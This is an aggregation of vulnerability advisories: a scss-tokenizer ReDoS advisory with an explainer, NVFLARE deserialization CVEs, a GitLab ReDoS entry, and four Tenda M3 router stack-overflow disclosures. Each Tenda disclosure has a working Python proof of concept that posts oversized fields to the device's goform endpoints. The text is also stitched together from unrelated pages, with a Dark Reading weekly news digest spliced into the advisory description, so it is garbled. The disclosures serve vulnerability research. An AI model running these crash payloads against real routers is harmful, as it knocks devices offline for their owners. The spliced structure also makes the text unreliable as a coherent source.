All versions of package scss-tokenizer are vulnerable to Regular Expression Denial of Service (ReDoS) via the loadAnnotation() function, due to the usage of insecure regex.

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2022-25758

**Regular expression denial of service in scss-tokenizer**

Moderate severity GitHub Reviewed Published Jul 2, 2022 • Updated Jul 6, 2022

We are still processing this advisory. You may have affected repositories that are not yet on this list. Check back soon for more.

**Package**

npm scss-tokenizer (npm)

**Affected versions**

<= 0.4.2

**Description**

GHSA-7mwh-4pqv-wmr8: Regular expression denial of service in scss-tokenizer

Dark Reading's digest of the other don't-miss stories of the week, including YouTube account takeovers and a sad commentary on cyber-pro hopelessness.

There's no such thing as a slow week for cybercrime, which means that covering the waterfront on all of the threat intelligence and interesting stories out there is a difficult, if not impossible, task. This week was no exception and, in fact, seemed to offer a veritable trove of important happenings that we would be remiss not to mention.

To wit: Dangerous malware campaigns! Info-theft! YouTube Account Takeovers! Crypto under siege! Microsoft warnings!

In light of this, Dark Reading is debuting a weekly "in case you missed it" (ICYMI) digest, rounding up important news from the week that our editors just didn't have time to cover before.

This week, read on for more on the following, ICYMI:

*   Smart Factories Face Snowballing Cyberactivity
*   Lazarus Group Likely Behind $100M Crypto-Heist
*   8220 Gang Adds Atlassian Bug to Active Attack Chain
*   Critical Infrastructure Cyber Pros Feel Hopeless
*   Hacker Impersonates TrustWallet in Crypto Phishing Scam
*   Cookie-Stealing YTStealer Takes Over YouTube Accounts
*   Follina Bug Used to Spread XFiles Spyware

**Smart Factories Face Snowballing Cyberactivity**

A whopping 40% of smart factories globally have experienced a cyberattack, according to a survey out this week.

Smart factories – in which industrial Internet of things IIoT) sensors and equipment are used to reduce costs, obtain telemetry, and bolster automation – are officially a thing, with the digitization of manufacturing well underway. But cyberattackers are taking notice too, according to Capgemini Research Institute.

Among sectors, heavy industry faced the highest volume of cyberattacks (51%). Those attacks take many forms, too: 27% of firms have seen an increase of 20% or more in bot-herders taking over IIoT endpoints for distributed denial-of-service (DDoS) attacks; and 28% of firms said they have seen an increase of 20% or more in employees or vendors bringing in infected devices, for instance.

"With the smart factory being one of the emblematic technologies of the transition to digitization, it is also a prime target for cyberattackers, who are scenting new blood," according to the report.

At the same time, the firm also uncovered that in nearly half (47%) of organizations, smart factory cybersecurity is not a C-level concern.

**Lazarus Group Likely Behind $100M Crypto-Heist**

Security researchers are laying the $100 million hack of the Horizon Bridge crypto exchange at the feet of North Korea's notorious Lazarus Group advanced persistent threat.

Horizon Bridge enables users of the Harmony blockchain to interact with other blockchains. The heist occurred June 24, with the culprits making off with various cryptoassets, including Ethereum (ETH), Tether (USDT), Wrapped Bitcoin (WBTC), and BNB.

According to Elliptic, there are strong indications that Lazarus is behind the incident. The group not only carries out classic APT activity like cyber-espionage, but also acts as a money-earner for the North Korean regime, researchers noted.

The thieves in this case have so far sent 41% of the $100 million in stolen crypto assets into the Tornado Cash mixer, Elliptic noted, which essentially acts as a money launderer.

**8220 Gang Adds Atlassian Bug to Active Attack Chain**

The 8220 Gang has added the latest critical security vulnerability affecting Atlassian Confluence Server and Data Center to its bag of tricks in order to distribute cryptominers and an IRC bot, Microsoft warned this week.

The Chinese-speaking threat group has been actively exploiting the bug since it was disclosed in early June.

"The group has actively updated its techniques and payloads over the last year. The most recent campaign targets i686 and x86\_64 Linux systems and uses RCE exploits for CVE-2022-26134 (Confluence) and CVE-2019-2725 (WebLogic) for initial access," Microsoft's Security Intelligence Centre tweeted.

**Critical Infrastructure Cyber Pros Feel Hopeless**

A staggering 95% of cybersecurity leaders at critical national infrastructure organizations in the UK say they could see themselves leaving their jobs in the next year.

According to a survey from Bridewell, 42% feel a breach is inevitable and don't want to tarnish their career, while 40% say they are experiencing stress and burnout which is impacting their personal life.

Meanwhile more than two -thirds of the respondents say that the volume of threats and successful attacks has increased over the past year – and 69% say it is harder to detect and respond to threats.

**Hacker Impersonates TrustWallet in Crypto Phishing Scam**

More than 50,000 phishing emails sent from a malicious Zendesk account made their way to email boxes in recent weeks, looking to take over TrustWallet accounts and drain funds.

TrustWallet is an Ethereum wallet and a popular platform for storing non-fungible tokens (NFTs). Researchers at Vade said that the phish impersonates the service, using a slick and convincing TrustWallet-branded site to ask for users' password recovery phrases on a sleek TrustWallet phishing page.

The emails, meanwhile, are unlikely to trigger email gateway filters, since they're being sent from Zendesk.com, which is a trusted, high-reputation domain.

"As NFTs and cryptocurrencies overall have seen a significant downturn in recent weeks, on-edge investors are likely to react quickly to emails about their crypto accounts," according to Vade's analysis this week.

**Cookie-Stealing YTStealer Takes Over YouTube Accounts**

A never-before-seen malware-as-a-service threat has emerged on Dark Web forums, aimed at taking over YouTube accounts.

Researchers at Intezer noted that the malware, which it straightforwardly calls YTStealer, works to steal YouTube authentication cookies from content creators in order to feed the underground demand for access to YouTube accounts. The cookies are extracted from the browser’s database files in the user’s profile folder.

"To validate the cookies and to grab more information about the YouTube user account, the malware starts one of the installed web browsers on the infected machine in headless mode and adds the cookie to its cookie store," according to the analysis. "\[That way\] the malware can operate the browser as if the threat actor sat down on the computer without the current user noticing anything."

From there, YTStealer navigates to YouTube’s Studio content-management page and nabs data, including the channel name, how many subscribers it has, how old it is, if it is monetized, if it's an official artist channel, and if the name has been verified.

**Follina Bug Used to Spread X-Files Spyware**

A rash of cyberattacks is underway, looking to exploit the Microsoft Follina vulnerability to lift scores of sensitive information from victims.

Follina is a recently patched remote code-execution (RCE) bug that's exploitable through malicious Word documents. It started life as an unpatched zero-day that quickly caught on among cybercrime groups.

According to a Cyberint Research Team report shared with Dark Reading via email, analysts found several XFiles stealer campaigns where Follina vulnerability was exploited as part of the delivery phase.

"The group that is selling the stealer is a Russia-region based and is currently looking to expand," researchers said. "Recent evidence suggests worldwide threat actor campaigns \[underway\]."

The stealer sniffs out data from all Chromium-based browsers, Opera, and Firefox, including history, cookies, passwords, and credit card information. It also lifts FTP, Telegram and Discord credentials, and looks for predefined file types that are located on the victim's Desktop along with a screenshot. It also targets other clients, such as Steam, and crypto-wallets.

ICYMI: A Microsoft Warning, Follina, Atlassian, and More

All versions of package scss-tokenizer are vulnerable to Regular Expression Denial of Service (ReDoS) via the  loadAnnotation() function, due to the usage of insecure regex.



Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

    regex = /A(B|C+)+D/
    

This regular expression accomplishes the following:

*   A The string must start with the letter 'A'
*   (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
*   D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

    $ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
    0.04s user 0.01s system 95% cpu 0.052 total
    
    

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as _catastrophic backtracking_.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

1.  CCC
2.  CC+C
3.  C+CC
4.  C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String

Number of C's

Number of steps

ACCCX

3

38

ACCCCX

4

71

ACCCCCX

5

136

ACCCCCCCCCCCCCCX

14

65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

CVE-2022-25758: Regular Expression Denial of Service (ReDoS) in org.webjars.npm:scss-tokenizer | CVE-2022-25758 | Snyk

NVFLARE, versions prior to 2.1.2, contains a vulnerability in its PKI implementation module, where The CA credentials are transported via pickle and no safe deserialization. The deserialization of Untrusted Data may allow an unprivileged network attacker to cause Remote Code Execution, Denial Of Service, and Impact to both Confidentiality and Integrity.

**Impact**

NVFLARE contains a vulnerability in its PKI implementation module, where The CA credentials are transported via pickle and no safe deserialization. The deserialization of Untrusted Data may allow an unprivileged network attacker to cause Remote Code Execution, Denial Of Service, and Impact to both Confidentiality and Integrity.  
All versions before 2.1.2 are affected.

CVSS Score = 9.8  
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**Patches**

The patch will be included in nvflare==2.1.2

**Workarounds**

Replace pickle serialization with JSON and change the code accordingly

Additional information  
Issue Found by: Oliver Sellwood (@Nintorac)

CVE-2022-31604

NVFLARE, versions prior to 2.1.2, contains a vulnerability in its utils module, where YAML files are loaded via yaml.load() instead of yaml.safe_load(). The deserialization of Untrusted Data, may allow an unprivileged network attacker to cause Remote Code Execution, Denial Of Service, and Impact to both Confidentiality and Integrity.

**Impact**

NVFLARE contains a vulnerability in its utils module, where YAML files are loaded via yaml.load() instead of yaml.safe\_load(). The deserialization of Untrusted Data, may allow an unprivileged network attacker to cause Remote Code Execution, Denial Of Service, and Impact to both Confidentiality and Integrity.

All versions before 2.1.2 are affected.  
CVSS Score = 9.8  
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**Patches**

The patch will be included in nvflare==2.1.2

**Workarounds**

Change yaml.load() to yaml.safe\_load()

**Additional information**

Issue Found by: Oliver Sellwood (@Nintorac)

CVE-2022-31605

A Regular Expression Denial of Service vulnerability in GitLab CE/EE affecting all versions from 1.0.2 prior to 14.10.5, 15.0 prior to 15.0.4, and 15.1 prior to 15.1.1 allows an attacker to make a GitLab instance inaccessible via specially crafted web server response headers

CVE-2022-1954

Tenda M3 V1.0.0.12 was discovered to contain a stack overflow via the function formGetPassengerAnalyseData.

**Overview**

*   The device's official website: https://www.tenda.com.cn/product/M3.html
*   Firmware download website: https://www.tenda.com.cn/download/detail-3133.html

**Affected version**

V1.0.0.12(4856)

**Vulnerability details**

httpd in directory /bin has a stack overflow vulnerability. The vulnerability occurrs in the formGetPassengerAnalyseData function, which can be accessed via the URL goform/getPassengerAnalyseData

formGetPassengerAnalyseData function gets the POST parameter time and searchand copies to stack buffer without checking its length, causing a stack overflow vulnerability.

**PoC**

Poc of Denial of Service(DoS)

import requests

data \= {
    b"time": b'A'\*0x400,
    b"search": b'A'\*0x400
}
cookies \= {
    b"user": "admin"
}
res \= requests.post("http://127.0.0.1/goform/getPassengerAnalyseData", data\=data, cookies\=cookies)
print(res.content)

CVE-2022-32041: IoT-vuln/Tenda/M3/formGetPassengerAnalyseData at main · d1tto/IoT-vuln

Tenda M3 V1.0.0.12 was discovered to contain a stack overflow via the function formSetCfm.

**Overview**

*   The device's official website: https://www.tenda.com.cn/product/M3.html
*   Firmware download website: https://www.tenda.com.cn/download/detail-3133.html

**Affected version**

V1.0.0.12(4856)

**Vulnerability details**

httpd in directory /bin has a stack overflow vulnerability. The vulnerability occurrs in the formSetCfm function, which can be accessed via the URL goform/setcfm

When the POST parameter funcname equals "save\_list\_data", the program will enter if branch at line 67. In this branch, program gets the POST parameter funcpara1 and funcpara2 then passed them to the function sub_45E28

In this function, program will enter the danger section when the length of funcpara2 is greater than 4. In this if branch, program copies funcpara1 to stack buffer by calling function sprintf without checking its length.

**PoC**

Poc of Denial of Service(DoS)

import requests

data \= {
    b"funcname": b"save\_list\_data",
    b"funcpara1": b'A'\*0x400,
    b"funcpara2": b'BBBBB'
    
}
cookies \= {
    b"user": "admin"
}
res \= requests.post("http://127.0.0.1/goform/setcfm", data\=data, cookies\=cookies)
print(res.content)

CVE-2022-32040: IoT-vuln/Tenda/M3/formSetCfm at main · d1tto/IoT-vuln

Tenda M3 V1.0.0.12 was discovered to contain a stack overflow via the listN parameter in the function fromDhcpListClient.

**Overview**

*   The device's official website: https://www.tenda.com.cn/product/M3.html
*   Firmware download website: https://www.tenda.com.cn/download/detail-3133.html

**Affected version**

V1.0.0.12(4856)

**Vulnerability details**

httpd in directory /bin has a stack overflow vulnerability. The vulnerability occurrs in the fromDhcpListClient function, which can be accessed via the URL goform/DhcpListClient

The POST parameter listN is concatenated. The program copies the POST argument without checking the length. We can set LISTEN equal to 1, the program will enter the red box, causing a stack overflow. Since the overflow overrides the LISTEN pointer variable, the atoi function will crash the program, causing a DOS attack in the second time looping.

**PoC**

Poc of Denial of Service(DoS)

import requests

data \= {
    b"LISTLEN": b"1",
    b"list1": b'A'\*0x300,
    b"page": b'A'
}
cookies \= {
    b"user": "admin"
}
res \= requests.post("http://127.0.0.1/goform/DhcpListClient", data\=data, cookies\=cookies)
print(res.content)

I use qemu-arm to emulate it. To make it work, I patched the httpd binary:

*   In the main function, The ConnectCfm function didn't work properly, so I patched it to NOP.
    
*   The R7WebsSecurityHandler function is used for permission control, and I've modified it to access URLs that can only be accessed after login.
    

In the main function, the program call the check_network function to get the IP address of the br0 interafce and use it as the listening address. So I create a iterface named br0 and configure its IP address to 127.0.0.1 .

CVE-2022-32039: IoT-vuln/Tenda/M3/fromDhcpListClient at main · d1tto/IoT-vuln

Tenda M3 V1.0.0.12 was discovered to contain a stack overflow via the function formSetAPCfg.

**Overview**

*   The device's official website: https://www.tenda.com.cn/product/M3.html
*   Firmware download website: https://www.tenda.com.cn/download/detail-3133.html

**Affected version**

V1.0.0.12(4856)

**Vulnerability details**

httpd in directory /bin has a stack overflow vulnerability. The vulnerability occurrs in the formSetAPCfg function, which can be accessed via the URL goform/setWtpData.

When the POST parameter op equals "bat", the program will enter if branch at line 139. The program then gets the POST parameters policy_type and radio_2g.

If policy_type is equal to wl_basic_policy, program will enter the if branch at line 180. There is a stack overflow in this if branch.

If policy_type is equal to neither wl_basic_policy nor qVLAN_policy, program will enter the if branch at line 199. There is also a stack overflow in this if branch.

**PoC**

Poc of Denial of Service(DoS)

import requests

data \= {
    b"op": b"bat",
    b"policy\_type": b"none",
    b"radio\_2g": b"A"\*0x400
}
cookies \= {
    b"user": "admin"
}
res \= requests.post("http://127.0.0.1/goform/setWtpData", data\=data, cookies\=cookies)
print(res.content)

Tag

#dos